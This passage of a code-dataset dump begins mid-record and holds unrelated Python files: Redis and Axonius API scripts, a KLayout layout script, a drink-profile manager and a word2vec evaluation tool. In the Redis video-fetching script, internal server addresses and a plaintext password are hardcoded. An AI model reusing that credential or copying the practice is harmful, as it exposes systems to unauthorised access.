**kwargs))\n\n ctx = axonapi.Connect(\n url=AX_URL,\n key=AX_KEY,\n secret=AX_SECRET,\n certwarn=False,\n cert_client_both=AX_CLIENT_CERT_BOTH,\n cert_client_cert=AX_CLIENT_CERT_CERT,\n cert_client_key=AX_CLIENT_CERT_KEY,\n log_level_console=\"debug\",\n log_level_api=\"debug\",\n log_console=True,\n )\n\n ctx.start()\n\n devices = ctx.devices\n users = ctx.users\n adapters = ctx.adapters\n enforcements = ctx.enforcements\n system = 
ctx.system\n","sub_path":"axonshell_manual.py","file_name":"axonshell_manual.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"350565549","text":"import sys\nfrom abstract_step import *\nimport copy\nimport csv\nimport glob\nimport os\nimport re\nimport yaml\n\nclass RawFileSources(AbstractSourceStep):\n\n    '''\n    The RawFileSources class acts as a temporary fix to get files into the pipeline.\n    This source creates a run for every sample.\n\n    Specify a file name pattern in *pattern* and define how sample names should be\n    determined from file names by specifying a regular expression in *group*.\n\n\n    '''\n\n    def __init__(self, pipeline):\n        super(RawFileSources, self).__init__(pipeline)\n        self.add_connection('out/raws')\n\n        self.add_option('pattern', str,\n            description = \"A file name pattern, for example \"\n            \"``/home/test/fastq/Sample_*.fastq.gz``.\")\n\n        self.add_option('group', str,\n            description = \"A regular expression which is applied to found files, and which is \"\n            \"used to determine the sample name from the file name. For example, \"\n            \"``(Sample_\\d+)_R[12].fastq.gz``, when applied to a file called \"\n            \"``Sample_1_R1.fastq.gz``, would result in a sample name of ``Sample_1``. \"\n            \"You can specify multiple capture groups in the regular expression.\")\n\n        self.add_option('paired_end', bool, description = \"Specify whether the samples are paired end or not.\")\n\n\n        self.add_option('sample_id_prefix', str, optional = True,\n            description = \"This optional prefix is prepended to every sample name.\")\n\n    def declare_runs(self):\n        regex = re.compile(self.get_option('group'))\n\n        found_files = dict()\n\n        # find files\n        for path in glob.glob(os.path.abspath(self.get_option('pattern'))):\n            match = regex.match(os.path.basename(path))\n            if match == None:\n                raise Exception(\"Couldn't match regex /%s/ to file %s.\" % (self.get_option('group'), os.path.basename(path)))\n\n            sample_id_parts = []\n            if self.is_option_set_in_config('sample_id_prefix'):\n                sample_id_parts.append(self.get_option('sample_id_prefix'))\n\n            sample_id_parts += list(match.groups())\n            sample_id = '_'.join(sample_id_parts)\n            if not sample_id in found_files:\n                found_files[sample_id] = list()\n            found_files[sample_id].append(path)\n\n        # declare a run for every sample\n        for run_id, paths in found_files.items():\n            with self.declare_run(run_id) as run:\n                run.add_public_info(\"paired_end\", self.get_option(\"paired_end\"))\n                for path in paths:\n                    run.add_output_file(\"raws\", path, [])\n\n\n\n","sub_path":"include/sources/raw_file_sources.py","file_name":"raw_file_sources.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"253004969","text":"#!/usr/bin/env python3\n\nimport json\nimport os\nimport zipfile\n\npfx = \"mk_profile:\"\n\nVERSION_FILE = \"profile/version.txt\"\n\n\ndef update_version(logger):\n    sd = get_server_data(logger)\n    if sd is False:\n        logger.error(\"Unable to complete without server data...\")\n        return False\n\n    # Update the profile version file with the info from server.json\n    with open(VERSION_FILE, 'w') as outfile:\n        outfile.write(sd['profile_version'])\n        outfile.close()\n\n    logger.info(pfx + \" done.\")\n\n\ndef profile_zip(logger):\n    src = 'profile'\n    abs_src = os.path.abspath(src)\n    with zipfile.ZipFile('profile.zip', 'w') as zf:\n        for dirname, subdirs, files in os.walk(src):\n            # Ignore dirs starting with 
a dot, stupid .AppleDouble...\n            if not \"/.\" in dirname:\n                for filename in files:\n                    if filename.endswith('.xml') or filename.endswith('txt'):\n                        absname = os.path.abspath(os.path.join(dirname, filename))\n                        arcname = absname[len(abs_src) + 1:]\n                        logger.info('profile_zip: %s as %s' %\n                                    (os.path.join(dirname, filename), arcname))\n                        zf.write(absname, arcname)\n    zf.close()\n\n\ndef get_server_data(logger):\n    # Read the SERVER info from the json.\n    try:\n        with open('server.json') as data:\n            serverdata = json.load(data)\n    except Exception as err:\n        logger.error('get_server_data: failed to read {0}: {1}'.format('server.json',err), exc_info=True)\n        return False\n    data.close()\n    # Get the version info\n    try:\n        version = serverdata['credits'][0]['version']\n    except (KeyError, ValueError):\n        logger.info('Version not found in server.json.')\n        version = '0.0.0.0'\n    # Split version into two floats.\n    sv = version.split(\".\");\n    v1 = 0;\n    v2 = 0;\n    if len(sv) == 1:\n        v1 = int(sv[0])\n    elif len(sv) > 1:\n        v1 = float(\"%s.%s\" % (sv[0],str(sv[1])))\n        if len(sv) == 3:\n            v2 = int(sv[2])\n        elif len(sv) > 3:\n            v2 = float(\"%s.%s\" % (sv[2],str(sv[3])))\n    serverdata['version'] = version\n    serverdata['version_major'] = v1\n    serverdata['version_minor'] = v2\n    return serverdata\n","sub_path":"rm_functions/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"288007699","text":"#coding=utf-8\nfrom rediscluster import StrictRedisCluster\nimport redis\nimport time\nimport datetime\n\ndef get_list(date):\n    r = redis.Redis(host='10.200.131.27', port=6000, password='kji93tzs')\n    key_prefix = 'headline_fresh_video_'\n    all_video = set()\n    filepath = '../normal_knn/jobs/data/video/video_list_' + date\n    fw = open(filepath, 'w')\n    key = key_prefix + date\n    result = r.smembers(key)\n    for i in result:\n        if i not in all_video:\n            all_video.add(i)\n            fw.write(i + '\\n')\n    fw.close()\n    return all_video\n\ndef get_video_data(date):\n    video_keys = get_list(date)\n    redis_nodes = [{'host':'10.200.131.32','port':6101},{'host':'10.200.131.31','port':6102},{'host':'10.200.131.27','port':6101},{'host':'10.200.131.28','port':6102}]\n    r = StrictRedisCluster(startup_nodes=redis_nodes)\n    filepath = '../normal_knn/jobs/data/video/video_data_' + date\n    fw = open(filepath, 'w')\n    key_prefix = 'headline_'\n    for v_key in video_keys:\n        key = key_prefix + v_key\n        video = r.get(key)\n        if isinstance(video, basestring):\n            fw.write(video + '\\n')\n    fw.close()\n\ndef get_last_n_date(n):\n    date_list = []\n    now_time = datetime.datetime.now()\n    for i in range(n-1):\n        delta = -1 - i\n        i_time = now_time + datetime.timedelta(days=delta)\n        i_date = i_time.strftime('%Y%m%d')\n        date_list.append(i_date)\n    return date_list\n\nif __name__=='__main__':\n    date_list = get_last_n_date(180)\n    date_list = ['20170513', '20170514']\n    for date in date_list:\n        get_video_data(date)\n","sub_path":"doc_related_videos/get_data/get_video_file.py","file_name":"get_video_file.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"639627750","text":"#%% import dependencies\ncd_siepic = r\"C:\\Users\\mhammood\\Documents\\GitHub\\SiEPIC-Tools2\\klayout_dot_config\\python\"\ncd_pdk = r\"C:\\Users\\mhammood\\Documents\\GitHub\\SiEPIC-Tools2\\klayout_dot_config\\tech\\GSiP\"\npdk = 'GSiP'\n\nlayer_Si220 = 'Si'\nlayer_floorplan = 'FloorPlan'\nlayer_text = 'Text'\n#%% initialize 
imports\nimport sys, os\nsys.path.append(cd_siepic); sys.path.append(cd_pdk)\n\ntry:\n import pya\nexcept ImportError:\n import klayout.db as pya\n\nfrom pya import Box, Trans, CellInstArray, Point, DPoint, Path, DPath\n\nsys.path.append(cd_pdk+r\"\\pymacros\")\nfrom GSiP_Library import *\nGSiP()\nfrom SiEPIC.utils import arc_xy, get_technology_by_name\nfrom siepic_tools.utils.tech import Tech\nlib = get_technology_by_name(pdk, cd_pdk)\n#%%create layout\nly = pya.Layout()\ndbu = ly.dbu = 0.001\ncell_top = ly.create_cell(\"Top\")\nly.prune_subcells(cell_top.cell_index(), 1000)\n\n#%%Define Layer mapping and floor plan\nLayerSiN = ly.layer(lib[layer_Si220])\nfpLayerN = cell_top.layout().layer(lib[layer_floorplan])\nTextLayerN = cell_top.layout().layer(lib[layer_text])\n# Draw the floor plan\nly_height = 350\nly_width = 600\ncell_top.shapes(fpLayerN).insert(Box(0,0, ly_width/dbu, ly_height/dbu))\n\n#%%Import Grating couplers\nGC_imported = ly.create_cell(\"Grating_Coupler_13deg_TE_1550_Oxide\", pdk).cell_index()\nGC_pitch = 127\nt = Trans(Trans.R0, 0.5*ly_width/dbu, (0.5*ly_height-GC_pitch/2)/dbu)\ncell_top.insert(CellInstArray(GC_imported, t, DPoint(0,GC_pitch).to_itype(dbu), Point(0,0), 2, 1))\n\n#%%draw waveguide connecting grating couplers\npath = [[0.5*ly_width,0.5*ly_height-GC_pitch/2]] # start point\npath.append([0.5*ly_width+50,0.5*ly_height-GC_pitch/2])\npath.append([0.5*ly_width+50, 0.5*ly_height+GC_pitch/2])\npath.append([0.5*ly_width,0.5*ly_height+GC_pitch/2]) # end point\npath = DPath([DPoint(each[0], each[1]) for each in path],0.5)\npath = path.to_itype(dbu)\npts = path.get_points()\n\nwidths = [0.5]\nlayers = ['Waveguide']\noffset = [0]\nradius = 15\n\nfrom siepic_tools.utils.layout import layout_waveguide2\nlayout_waveguide2(lib, ly, cell_top, layers, widths, offset, pts, radius, False,0)\n\ncd_save = r\"C:\\Users\\mhammood\\Documents\\GitHub\\SiEPIC-Tools2\\Examples\\script_layouts\\gc_shunt\"\nos.chdir(cd_save)\nly.write(\"gc_shunt.gds\")\n\n# %%\n","sub_path":"Examples/script_layouts/gc_shunt/gc_shunt.py","file_name":"gc_shunt.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"647679099","text":"#!/usr/bin/env python3\n\"\"\"\nProgrammer: Chris Blanks\nLast Edited: 1/12/2019\nProject: Automated Self-Serving System\nPurpose: This script defines the Drink Class.\n\nNote:\n - The current code can only handle JPGs, so have to make it capable of more\n file types if the user will eventually be able to pull images from google images\n - Possible additions:\n *a pop up window that displays current drink profiles and related ingredients\n *a method for retrieving images from url (or really from anywhere)\n\"\"\"\n\nimport os\nimport pathlib\nimport shutil\n\n\nclass DrinkProfile:\n \n def __init__(self,drink_txt_file_path = None,main_directory=None):\n if main_directory == None:\n self.MAIN_DIRECTORY_PATH = \"\"\n else:\n self.MAIN_DIRECTORY_PATH = main_directory \n self.DRINK_PROFILE_DIRECTORY = self.MAIN_DIRECTORY_PATH +\"/resources/drink_profiles\"\n self.CONFIG_FILE_PATH = self.MAIN_DIRECTORY_PATH + \"/resources/system_info/config.txt\"\n\n self.drink_txt_file = drink_txt_file_path\n self.pic_extension = None\n self.isNewDrink = False\n \n #drink attributes that can be set by GUI\n self.id_number = None\n self.name = None\n self.ingredients = None\n self.pic_location = None\n self.isUrl = \"False\"\n self.isActive = \"1\"\n self.price = 0.0\n \n \"\"\"\n Note on 
self.edited_attributes:\n        Changes in the values of this attribute will mean that the new value\n        will replace the previous value in the text file for the drink profile.\n        Each index corresponds to one of the drink attributes declared above, in\n        order, so index 0 is id_number and index 6 is the price of the drink\n        \"\"\"\n        self.edited_attributes = [0,0,0,0,0,0,0]\n        \n        self.checkIfNew()\n\n\n    def checkIfNew(self):\n        \"\"\"Checks to see if the drink object is a new drink option. If new then the isNewDrink boolean will be True\n        until the instance's attributes are defined and the createDrinkProfile method is called on the instance.\"\"\"\n        if self.drink_txt_file == None:\n            self.isNewDrink = True\n        else:\n            self.getDrinkProfile()\n\n\n    def getDrinkProfile(self):\n        \"\"\"Retrieves drink profile information from a subdirectory\"\"\"\n        isNewPath = False\n        lines = []\n        \n        with open(self.drink_txt_file,'r+',encoding=\"ISO-8859-1\") as file:\n            line_count = 1\n            for line in file:\n                line = line.encode('utf8').decode('iso-8859-1')\n                if line_count == 1:\n                    self.id_number = line.split()[1]\n                if line_count == 2:\n                    self.name = line.split()[1].replace('_',' ')\n                if line_count == 3:\n                    ingredient_list = line.split()\n                    self.ingredients = ingredient_list[1:len(ingredient_list)]\n                if line_count == 4:\n                    pic_path = line.split()[1]\n                    paths = pic_path.split(\"/\")\n                    cur_dir_paths = (self.MAIN_DIRECTORY_PATH).split(\"/\")\n                    path_check_indx = len(cur_dir_paths)-1 #resources directory should always be longer\n                    if paths[:path_check_indx] == cur_dir_paths[:path_check_indx]:\n                        self.pic_location = line.split()[1] #same beginning path, so keep\n                    else:\n                        print(\"Paths seem to be different.\")\n                        if \".jpg\" in pic_path:\n                            self.pic_location = (self.drink_txt_file).replace(\".txt\",\".jpg\")\n                            isNewPath = True\n                    \n                    \n                if line_count == 5:\n                    self.isUrl = line.split()[1]\n                if line_count == 6:\n                    self.isActive = line.split()[1]\n                if line_count == 7:\n                    self.price = line.split()[1]\n\n                line_count += 1\n                lines.append(line)\n        if self.isUrl == \"False\":\n            self.pic_extension = os.path.splitext(self.pic_location)[1]\n        #if paths don't match up, rewrite old one\n        if isNewPath == True:\n            lines[3] = \"picture_location \" + self.pic_location + \"\\n\"\n            with open(self.drink_txt_file,'w',encoding=\"ISO-8859-1\") as file:\n                file.writelines(lines)\n\n\n    def createDrinkProfile(self,desired_pic_path=None):\n        \"\"\"Creates a new drink profile in the designated directory.\n        *Functions as a callback for a GUI element after the instance's attributes are populated.\n        *Drinks are by default active until changed to inactive in GUI.\"\"\"\n\n        self.drink_profile_path = self.DRINK_PROFILE_DIRECTORY + \"/\" + self.name\n        self.pic_location = self.drink_profile_path + \"/\" + self.name + self.pic_extension\n        pathlib.Path(self.drink_profile_path).mkdir(exist_ok = True)\n        os.chdir(self.drink_profile_path)\n        \n        new_name = self.name +\".txt\"\n        with open(new_name,\"w\",encoding=\"ISO-8859-1\") as new_text_file :\n            new_text_file.write(\"id_number \" + self.id_number+\"\\n\")\n            new_text_file.write(\"name \" + self.name+\"\\n\")\n            new_text_file.write(\"ingredients \" + self.ingredients+\"\\n\")\n            new_text_file.write(\"picture_location \" + self.pic_location+\"\\n\")\n            new_text_file.write(\"isUrl \" + str(self.isUrl)+\"\\n\")\n            new_text_file.write(\"isActive \" + self.isActive+\"\\n\")\n            new_text_file.write(\"Price \"+str(self.price)+ \"\\n\")\n        \n        if self.isUrl != \"False\":\n            print(\"Somehow the impossible happened?\")\n            print(self.isUrl)\n            pass #grab pic from url\n        
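# NOTE: downloading the picture from a URL is not implemented yet; this\n        # branch only reports the unexpected isUrl value and falls through\n        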
else:\n if desired_pic_path == None:\n pass \n elif os.path.exists(desired_pic_path):\n try:\n shutil.copyfile(desired_pic_path,self.pic_location)\n except IOError as e:\n print(\"Unable to copy file. %s\" %e)\n else:\n print(\"Desired path does not exist.\")\n \n self.isNewDrink = False\n \n os.chdir(self.MAIN_DIRECTORY_PATH)\n\n \n def editDrinkProfile(self):\n \"\"\"Edits an existing drink profile with the value change that was packed into the instance's\n edited_attributes attribute.\"\"\"\n attrib_indx = 0\n changes = []\n for attrib_change in self.edited_attributes:\n print(attrib_change)\n if attrib_change == 0:\n pass\n else:\n changes.append((attrib_indx + 1,attrib_change)) #attrib_indx must match line number\n attrib_indx +=1\n\n self.changeValuesInTextFile(changes) \n\n #reset edited_attributes\n for i in range(len(self.edited_attributes)):\n self.edited_attributes[i] = 0\n\n\n def changeValuesInTextFile(self,changes):\n \"\"\"Takes a tuple as input. The first parameter is the row number, and the second parameter\n is the new value.\"\"\"\n with open(self.drink_txt_file,'r+',encoding=\"ISO-8859-1\") as file:\n lines = file.read().splitlines()\n file.seek(0)\n \n line_headers = [\"id_number \",\"name \",\"ingredients \",\"picture_location \", \"isUrl \",\"isActive \",\"Price \"]\n line_count = 1\n for line in lines:\n for i in range(len(changes)):\n if line_count == changes[i][0]:\n line = line_headers[line_count - 1]+str(changes[i][1])\n print(line)\n if changes[i][0] == 4:\n self.acquireDesiredPic(changes[i][1]) #change picture\n file.write(line+\"\\n\")\n line_count +=1\n\n\n \n def deleteDrinkProfile(self):\n \"\"\"Deletes an existing drink profile \"\"\"\n self.name = (self.name).replace(' ','_')\n \n drink_profile_path = self.DRINK_PROFILE_DIRECTORY + \"/\" + self.name\n pic_location = drink_profile_path + \"/\" + self.name + self.pic_extension\n txt_file = drink_profile_path + \"/\" + self.name + \".txt\"\n \n os.remove(txt_file)\n os.remove(pic_location)\n os.rmdir(drink_profile_path)\n\n \n def addDrinkToConfig(self, path= None):\n \"\"\"Adds a drink to the configuration file for the main application if it is new.\"\"\"\n if path == None:\n path = self.CONFIG_FILE_PATH\n with open(path,\"r+\",encoding=\"ISO-8859-1\") as f:\n lines = f.read().splitlines()\n f.seek(0)\n \n line_number = 1\n for line in lines:\n if line_number == 2:\n occurences_indx = []\n start = 0\n while True:\n index_new = line.find(self.name,start)\n if index_new == -1:\n break\n start = index_new + len(self.name)\n occurences_indx.append(index_new)\n if not occurences_indx:\n line = line +\" \"+ self.name\n else:\n isNotARepeat = True\n for sub_indx in occurences_indx:\n if line.endswith(self.name) or line[ sub_indx + len(self.name)] == \" \":\n isNotARepeat = False\n if isNotARepeat:\n line = line +\" \"+ self.name + \" \"\n \n f.write(line+\"\\n\") #overwrites existing content\n line_number += 1\n\n\n def acquireDesiredPic(self,desired_pic_path):\n \"\"\"Acquires the desired pic and sets the pic_location attribute of the drink object.\"\"\"\n\n if \".jpg\" in desired_pic_path:\n self.pic_extension = \".jpg\" #setup extension\n elif \"png\" in desired_pic_path :\n self.pic_extension = \".png\" #setup extension\n\n if \" \" in self.name:\n self.name = (self.name).replace(\" \",\"_\")\n \n self.drink_profile_path = self.DRINK_PROFILE_DIRECTORY + \"/\" + self.name\n self.pic_location = self.drink_profile_path + \"/\" + self.name + self.pic_extension\n if desired_pic_path == self.pic_location:\n pass 
#nothing to change\n        else:\n            shutil.copyfile(desired_pic_path,self.pic_location)\n        \n        \n        \n\n### Functions for testing DrinkProfile class's robustness\n\ndef testExistingDrink():\n    \"\"\"Tests viewing the attributes of an existing drink profile.\"\"\"\n    base_dir = DrinkProfile().DRINK_PROFILE_DIRECTORY  # module-level test: there is no self here\n    test_drink = DrinkProfile(base_dir+\"/cuba_libre/cuba_libre.txt\")\n\n    print(test_drink.name,\"\\nId:\",test_drink.id_number,\"\\n\",test_drink.ingredients)\n    print(test_drink.pic_location,\"\\n\",test_drink.isUrl,\"\\n\",test_drink.pic_extension)\n    print(test_drink.price)\n\n\ndef testNewDrink():\n    \"\"\"Tests creating a drink profile.\"\"\"\n    test_drink2 = DrinkProfile()\n    test_drink2.name = \"test_drink_2\"\n    test_drink2.id_number = \"24\"\n    test_drink2.ingredients = \"stuff ingredients nothing really\"\n    test_drink2.isUrl = \"False\"\n    test_drink2.pic_extension = \".jpg\"\n    test_drink2.price = 5.99\n\n    test_drink2.createDrinkProfile(\"/home/pi/Pictures/drink.jpg\") \n\n\ndef testAddingDrinkToConfig():\n    \"\"\"Tests adding a drink name to the config file for the system.\"\"\"\n    test_drink3 = DrinkProfile()\n    test_drink3.name = \"vodka\"\n    test_drink3.id_number = \"25\"\n    test_drink3.ingredients = \"stuff ingredients nothing really\"\n    test_drink3.isUrl = \"False\"\n    test_drink3.pic_extension = \".jpg\"\n\n    test_drink3.addDrinkToConfig(\"config_copy.txt\")\n\n\ndef testDeletingADrinkProfile():\n    \"\"\"Tests deleting a drink profile.\"\"\"\n    base_dir = DrinkProfile().DRINK_PROFILE_DIRECTORY\n    test_drink4 = DrinkProfile(base_dir+\"/Test_drink_2/test_drink_2.txt\")\n    test_drink4.deleteDrinkProfile()\n\n\ndef testEditDrinkProfile():\n    \"\"\"Tests editing a drink profile.\"\"\"\n    base_dir = DrinkProfile().DRINK_PROFILE_DIRECTORY\n    test_drink5 = DrinkProfile(base_dir+\"/Test_drink_2/test_drink_2.txt\")\n    test_drink5.id_number = \"100\"\n    test_drink5.isActive = \"0\"\n    test_drink5.price = 4.05\n    \n    test_drink5.edited_attributes[0] = test_drink5.id_number\n    test_drink5.edited_attributes[5] = test_drink5.isActive  # index 5 -> isActive (line 6)\n    test_drink5.edited_attributes[6] = test_drink5.price  # index 6 -> price (line 7)\n    test_drink5.editDrinkProfile()\n    print(test_drink5.edited_attributes)\n    \n\nif __name__ == \"__main__\":\n    #testExistingDrink()\n    #testNewDrink()\n    #testAddingDrinkToConfig()\n    #testDeletingADrinkProfile()\n    #testEditDrinkProfile()\n    pass\n","sub_path":"build/lib/AutomatedDrinkDispensingSystem/DrinkProfile.py","file_name":"DrinkProfile.py","file_ext":"py","file_size_in_byte":12714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"576327137","text":"new_table='icons/new_table.png'\nopen_table='icons/open_table.png'\ndump_table='icons/dump_table.png'\nclose_table='icons/close_table.png'\nexit_application='icons/exit.png'\nadd_expense='icons/add_expense.png'\ngrouped_by_months='icons/grouped_by_months.png'\ngrouped_by_categories='icons/grouped_by_categories2_64p.png'\nlogin_required='icons/login_required3.png'\nlogin_successful='icons/login_successful3.png'","sub_path":"icon_paths.py","file_name":"icon_paths.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"563728275","text":"import torch\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nfrom model import SkipGramModel,TimestampedSkipGramModel\nfrom data_reader import DataReader, Word2vecDataset,TimestampledWord2vecDataset\nimport json\n\nimport os\nimport argparse\nimport pickle\nimport numpy as np\n# from scipy.spatial import distance\nfrom sklearn.metrics.pairwise import 
cosine_similarity\nfrom sklearn.manifold import TSNE\nfrom matplotlib import pyplot as plt\nfrom sys import platform\nif platform != \"darwin\":\n plt.switch_backend('agg')\n\n\n#coca 0 29 1990 - 2019\n#coha 0 199 1810 2009\n#arxiv 0 352 2007.4 - 2020.4\n# nyt 1987- 2007\n# nyt_yao 1986 - 2015\n\nyear_mapping = {\n # \"coha.txt.raw.token.decade-output\": ([(i-1810)//10 for i in range(1810, 2020, 10)],[str(i)+\"s\" for i in range(1810, 2020, 10)]),\n # \"coca.txt.raw.token.decade-output\": ([(i-1990)//10 for i in range(1990, 2020, 10)],[str(i)+\"s\" for i in range(1990, 2020, 10)]),\n # \"coca.txt.raw.token-output\": ([i-1990 for i in range(1990, 2020, 1)],[str(i) for i in range(1990, 2020, 1)]),\n # \"coha.txt.raw.token-output\": ([i-1810 for i in range(1810, 2009, 1)],[str(i) for i in range(1810, 2009, 1)]),\n # \"arxiv.txt.raw.token-output\": ([i for i in range(0, 352, 1)],[\"{}-{}\".format( i//12 +1991, i%12+1 ) for i in range(0, 352, 1)]) ,\n # \"nyt.txt.norm-output\": ([i-1987 for i in range(1987, 2007, 1)],[str(i) for i in range(1987, 2007, 1)]),\n # \"nyt_yao.txt-output\": ([i-1986 for i in range(1986, 2015, 1)],[str(i) for i in range(1986, 2015, 1)]),\n \"newsit.txt.norm-output\": ([i-2007 for i in range(2007, 2019, 1)],[str(i) for i in range(2007, 2019, 1)]),\n \"repubblica.txt.norm-output\": ([i-1984 for i in range(1984, 2019, 1)],[str(i) for i in range(1984, 2019, 1)]),\n\n}\n\n\n\n\n#word_sin word_cos word_mixed word_linear word_mixed_fixed\nparser = argparse.ArgumentParser(description='parameter information')\nparser.add_argument('--time_type', dest='time_type', type=str,default= \"word_mixed\", help='sin cos mixed others linear, sin, word_sin,word_cos,word_linear')\nparser.add_argument('--text', dest='text', type=str,default= \"coha.txt.train\", help='text dataset')\nparser.add_argument('--use_time', dest='use_time', default= 1, type=int, help='use_time or not')\nparser.add_argument('--output', dest='output', default= \"coha\" , type=str, help='output dir to save embeddings')\nparser.add_argument('--log_step', dest='log_step', default= 100 , type=int, help='log_step')\nparser.add_argument('--from_scatch', dest='from_scatch', default= 1 , type=int, help='from_scatch or not')\nparser.add_argument('--batch_size', dest='batch_size', default= 128, type=int, help='batch_size')\nparser.add_argument('--emb_dimension', dest='emb_dimension', default= 50 , type=int, help='emb_dimension')\nparser.add_argument('--add_phase_shift', dest='add_phase_shift', default= 0, type=int, help='add_phase_shift')\nparser.add_argument('--verbose', dest='verbose', default= 0, type=int, help='verbose')\nparser.add_argument('--lr', dest='lr', default= 0.01, type=float, help='learning rate')\nparser.add_argument('--do_eval', dest='do_eval', default= 1, type=int, help='verbose')\nparser.add_argument('--iterations', dest='iterations', default= 2, type=int, help='iterations')\nparser.add_argument('--years', dest='years', default= 30, type=int, help='years')\nparser.add_argument('--weight_decay', dest='weight_decay', default= 0, type=float, help='weight_decay')\nparser.add_argument('--time_scale', dest='time_scale', default= 1, type=int, help='time_scale')\nparser.add_argument('--min_count', dest='min_count', default= 25, type=int, help='min_count')\nparser.add_argument('--window_size', dest='window_size', default= 5, type=int, help='window_size')\n\nargs = parser.parse_args()\n\n\n\n\nif not torch.cuda.is_available():\n args.verbose = 1\n\n\n\nimport numpy as np\nimport heapq\nimport scipy \n\ndef 
keep_top(arr,k=3): \n smallest = heapq.nlargest(k, arr)[-1] # find the top 3 and use the smallest as cut off\n arr[arr < smallest] = 0 # replace anything lower than the cut off with 0\n return arr\n\n\ndef read_embeddings_from_file(file_name):\n embedding_dict = dict()\n with open(file_name,encoding=\"utf-8\") as f:\n for i,line in enumerate(f):\n if i==0:\n vocab_size,emb_dimension = [int(item) for item in line.split()]\n # embeddings= np.zeros([vocab_size,emb_dimension])\n else:\n tokens = line.split()\n word, vector = tokens[0], [float(num_str) for num_str in tokens[1:]]\n embedding_dict[word] = vector\n return embedding_dict\n\n\n\n\nclass Word2VecChecker:\n def __init__(self,path = \"output\",time_type = \"word_sin\"):\n # for time_type in os.listdir(path):\n # if \".DS_Store\" in time_type:\n # continue\n self.path = path\n subpath = os.path.join(path,time_type)\n if args.add_phase_shift:\n subpath += \"_shift\"\n if not os.path.exists(os.path.join(subpath,\"vectors.txt\")):\n print(\"cannot find vectors.txt in {}, try to find {}-th iteration\".format(subpath,args.iterations))\n subpath = os.path.join(subpath,str(args.iterations-1))\n if not os.path.exists(subpath):\n print(\"cannot load model from {}\".format(subpath))\n return\n self.embedding_dict = read_embeddings_from_file(os.path.join(subpath,\"vectors.txt\"))\n if args.use_time and \"word2vec\" not in time_type:\n self.skip_gram_model = TimestampedSkipGramModel(len(self.embedding_dict), args.emb_dimension,time_type = time_type, add_phase_shift=args.add_phase_shift) \n else:\n self.skip_gram_model = SkipGramModel(len(self.embedding_dict), args.emb_dimension)\n \n self.id2word = pickle.load(open(os.path.join(subpath, \"dict.pkl\"),\"rb\"))\n self.skip_gram_model.load_embeddings(self.id2word,subpath)\n\n\n\n\n # print(embeddings)\n def get_similar_words(self,words,year,k=3,word2id=None):\n if word2id is None:\n word2id = {value:key for key,value in self.id2word.items()}\n embeddings_vectors = self.get_embedding_in_a_year(self.embedding_dict.keys(),word2id=word2id,year =year)\n \n # embeddings_vectors = np.array( [vector for word,vector in embeddings])\n # all_words = [word for word,vector in embeddings]\n not_found_words = [word for word in words if word not in word2id]\n if len(not_found_words) > 0:\n print(\"do not find {}\".format(\" \".join(not_found_words)) )\n words_index = [word2id[word] for word in words if word in word2id]\n # print(words_index)\n\n selected_vectors = np.array( [embeddings_vectors[word] for word in words_index])\n \n a = np.dot(selected_vectors,embeddings_vectors.T)#/np.norm()\n # a = cosine_similarity(selected_vectors,embeddings_vectors)\n \n top_k = a.argsort()[:,-1*k:]#[::-1]\n # top_k = np.partition(a, -3)\n # print(top_k.shape)\n # print(top_k)\n\n words_str = [ \" \".join([self.id2word[word] for word in top_k_per_word[::-1]]) for top_k_per_word in top_k ]\n return words_str\n\n # ranks = np.argsort(a,axis = 0)\n # print(ranks.argmax(0))\n # print(a.squeeze())\n # print(a.squeeze().argmax())\n # print(a.argmax(1))\n # print(a)\n # exit()\n def word_change_rate(self,words, years = 30):\n vectors = []\n for year in range(years):\n word2id = {value:key for key,value in self.id2word.items()}\n embeddings_vectors = self.get_embedding_in_a_year(self.embedding_dict.keys(),word2id=word2id,year =year)\n \n # embeddings_vectors = np.array( [vector for word,vector in embeddings])\n # all_words = [word for word,vector in embeddings]\n\n words_index = [word2id[word] for word in words]\n # print(words_index)\n\n 
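# gather this year's embedding of each tracked word before measuring drift\n            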
selected_vectors = np.array( [embeddings_vectors[word] for word in words_index])\n vectors.append(selected_vectors)\n \n \n for j in range(len(words)):\n change_rates = []\n for year in range(years):\n if year ==0 :\n cur_vector = vectors[year][j]\n else:\n \n # change_rate = np.dot(cur_vector,vectors[year][j])\n change_rate = scipy.spatial.distance.cosine(cur_vector,vectors[year][j])\n cur_vector = vectors[year][j]\n change_rates. append(change_rate)\n print(words[j],np.mean(np.array(change_rates)))\n print(change_rates)\n \n\n return\n\n def plot_words_in_many_years(self,words= None, years = [i for i in range(1977,2020,1)],word2id=None,name=\"image\"):\n if words is None:\n words = [\"president\" , \"reagan\", \"trump\", \"biden\", \"obama\",\"bush\",\"carter\",\"clinton\", \"ford\", \"nixon\"]\n # words = [\"weapon\" , \"nuclear\", \"energy\"]\n if word2id is None:\n word2id = {value:key for key,value in self.id2word.items()}\n vectors = []\n names = []\n for year in years:\n names.extend([\"{}-{}\".format(word,year) for word in words])\n embeddings = self.get_embedding_in_a_year(words,year,word2id)\n vectors.extend(embeddings)\n embed = TSNE(n_components=2).fit_transform(vectors)\n # print(embed.shape)\n\n plt.figure(figsize = (12,12))\n # from adjustText import adjust_text \n texts = []\n for i,point in enumerate(embed):\n plt.scatter(point[0],point[1],label =names[i])\n texts.append(plt.text(point[0],point[1], names[i],size =7))\n # plt.plot(embed[:,0],embed[:,1],names)\n\n # adjust_text(texts)\n # plt.legend()\n if platform == \"win32\":\n plt.show()\n else:\n plt.savefig(\"president-{}.pdf\".format(name),bbox_inches = \"tight\",pad_inches=0)\n 